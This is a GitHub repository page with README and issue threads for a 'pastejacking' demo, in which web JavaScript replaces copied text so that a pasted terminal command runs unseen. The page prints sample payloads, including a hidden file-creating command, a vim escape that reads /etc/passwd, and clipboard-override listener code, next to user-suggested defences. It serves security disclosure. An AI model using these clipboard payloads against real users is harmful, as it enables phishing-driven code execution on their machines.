dxa4481 / pastejacking Goto Github PK

A demo of overriding what's in a person's clipboard

Home Page: https://security.love/Pastejacking

License: GNU General Public License v3.0

HTML 100.00%

pastejacking's Introduction

Pastejacking

Browsers now allow developers to automatically add content to a user's clipboard, following certain conditions. Namely, this can only be triggered on browser events. This post details how you can exploit this to trick a user into running commands they didn't want to get ran, and gain code execution.

It should also be noted, for some time similar attacks have been possible via html/css. What's different about this is the text can be copied after an event, it can be copied on a short timer following an event, and it's easier to copy in hex characters into the clipboard, which can be used to exploit VIM, all shown below.

Demo

Here is a demo of a website that entices a user to copy an innocent looking command https://security.love/Pastejacking

This demo uses JavaScript to hook into the copy event, which will fire via ctrl+c or right-click copy. Right now this demo does works in Chrome, Firefox, and Safari but not with Internet Explorer, however there is a demo below which is IE compatible.

echo "not evil"

Will be replaced with

echo "evil"\r\n

Note the newline character gets appended to the end of the line. When a user goes to paste the echo command into their terminal, "evil" will automatically get echoed to the screen without giving the user a chance to review the command before it executes.

This demo hooks into the keydown event, so if a user uses keyboard shortcuts, i.e. ctrl+c or command+c, an 800ms timer gets set that will override the user's clipboard with malicious code. This demo works in Chrome, Firefox, and Internet Explorer, but is not compatable with Safari.

More sophisticated payloads that hide themselves can also be used, such as something demoed here and seen below

touch ~/.evil
clear
echo "not evil"

This command will create an evil file in your home directory and clear the terminal out. The victim appears to have the command they intended to copy, nicely pasted into the terminal.

Impact

This method can be combined with a phishing attack to entice users into running seemingly innocent commands. The malicious code will override the innocent code, and the attacker can gain remote code execution on the user's host if the user pastes the contents into the terminal.

How do you protect yourself?

This is not so straight forward. One solution may be to verify the contents of your clipboard before pasting into a terminal, but be careful where you verify these commands. For example if you paste into vim, vim macros may be used to exploit you. An example of this can be seen in this demo and below

copyTextToClipboard('echo "evil"\n \x1b:!cat /etc/passwd\n');

This demo echo evil when pasted in terminal, and it will cat the user's /etc/passwd file when pasted into vim.

One solution around this can be seen below

"+p       -- within vim to paste clipboard without interpreting as vim command

If you're running iTerm, you will actually get warned if the command ends with a newline as seen here:

Of course it goes without saying, take note of the source you're pasting from, and exercise additional caution if pasting from questionable sources.

pastejacking's People

Contributors

Stargazers

Watchers

Forkers

davidthornton palerdot parasdsingh ariesw atouhou io41 security-geeks c2y2 mikalv drexlma bogdan-pr shaneoh cyber-forensic inscriptionweb rtruxal wpsmith mediatros leomartindev puniaze edgar-montano nhan712 pravindahal 0x37n0w4n timrc shekkbuilder ptwoms paulog darthra techscientist ivosandoval andy737 symbiansymoh kevinziegler tbranyen owenb132 superuser5 techgaun hmsh00d 335622119 sevck bradparks dobfuscator x86labs petasittek x3hong plazmaz ellipsys gowth4m michalkoczwara solertis olivierh59500 brandontict kevinmel2000 dstrbad player0k hamidionline tobey123 puppycodes expertasif jojinkb mkfmn gujjuboy10x00 flying0er smallpig301 panckazzz fingerleakers ro9ueadmin voilet7z malwar3ninja helloexp minkione yved pentestbr spankders sky-commits sgml hack-things forklifters acollectionofatoms humoyun-ahmad 5l1v3r1 rakhithjk siegelcpp hollow667 hloverflow nusaibsqli codeforg cutff masterscott vkbiu jdixoncs securecloud-biz stonzyy opsy1337 lay0us1 letmekillthemall sh770

pastejacking's Issues

Is it safe to just use `cat` or $(cat)?

Like, you paste into cat, and if you reviewed and want to execute you can just press ctrl-D, and if you don't want to execute then just press ctrl-C.

Is there any character that could cause ctrl-D to be pressed, or is there other forms of attack against this method?

I have noscript installed

With noscript installed i dont have to worry about hidden scripts running in the background. This isnt an issue just a comment for everyone to install this plugin.
NoScript.net

Website down

https://security.love seems to be down…

Doesn't work with right click-> copy, nor with auto-copy-on-highlight (linux/Mac)

neat trick, but it doesn't pastejack if I copy with right click-> copy, nor in Linux which auto copies text when selected, or with Firefox add-ons which do the same in Mac OS X. I don't know if there is a solution to that, but maybe you can add it to the 'How do you protect yourself' section of the readme

Easier solution: Just type it in

Instead of copy-pasting.

Suggestion: use X(org) selection on *nix

With X(org) on *nix systems it is common to copy text simply by selecting it and pasting it via middle click. It seems like this procedure is not affected by pastejacking.

Is this assumption correct or are there simply no attempts to cover this yet?

Real world concerns and weaponizing

So I totally understand how this exploit works, but I'm curious who we think the target audience is and how well could one actually weaponize such an exploit. To me it seems like a pretty big stretch to get a high value target to copy and paste code off of an untrusted website and into a shell, but I'm open to other opinions and ideas.

First off, this exploit is easily defeated by pasting your clipboard into a benign text editor such as Sublime Text or Notepad. Nothing new here, but if this exploit does start to become a serious problem then I would assume this easy procedure would protect people 100% of the time.

But more interesting to me is the intended targets. It sounds to me like students, web hobbyists, perhaps a rushed dev-ops engineer would be the most likely phishing target. I just can't think of that many users who use the terminal and aren't power users. It's not like MS Word or Photoshop is gonna execute the hidden commands if a user pastes this message into them. But maybe I'm being naive, as we are all becoming more and more computer proficient and maybe more people are using the terminal.

I'm curious to hear any responses or thoughts about this, and thanks again for making the effort to publish this exploit and bring more attention to it.

Nullifies the threat if you just right click and select "Copy" option.

Doesn't work with Safari

Just use copy event

This currently relies on keydown, but as it turns out you can just do the following

document.addEventListener('copy', function(e){
    e.clipboardData.setData('text/plain', 'Hello, world!');
    e.clipboardData.setData('text/html', '<b>Hello, world!</b>');
    e.preventDefault(); // We want our data, not data from any selection, to be written to the clipboard
});

I'll be adding this soon!

Easier solution: Use ZSH

I think it should be mentioned that this doesn't work with zsh, as it only executes commands when the user presses enter, not when pasting a newline.

Possible solution?

While pasting text in gedit can be used to verify commands, what about a bash command?

I made a bash function that will show the clipboard safely and gives you the option to execute it after reviewing. You don't need to open any other programs like gedit (and also prevents vim scripts) and can be used on servers (ssh) without a gui.

It needs xclip to be installed. cat is used to display the clipboard and will also show special characters. (pp is for paste protection and it types fast)

function pp {
    xclip -o | cat -A
    echo -ne "\nExecute? (y/n): "
    read execute
    # only execute when 'y' was answered
    # all other input is ignored
    if [[ $execute == "y" ]]; then
        eval `xclip -o`
    fi
}

Example from the demo:

aaron@aaron-pc:~$ pp
echo "evil"$

Execute? (y/n): n
aaron@aaron-pc:~$

aaron@aaron-pc:~$ pp
echo "evil"$

Execute? (y/n): y
evil
aaron@aaron-pc:~$

Doesn't seem to work in Chrome

This doesn't seem to work in Chrome Version 50.0.2661.86 (64-bit).

Has this been exploited in the wild?

Has anyone found any evidence of this (or the old issue) being used in the wild? I absolutely think that it's a relevant issue, just thought it would be interesting to know if it has been used maliciously.

(I know this technically isn't the correct place to post something like this but I felt like it was the best alternative.)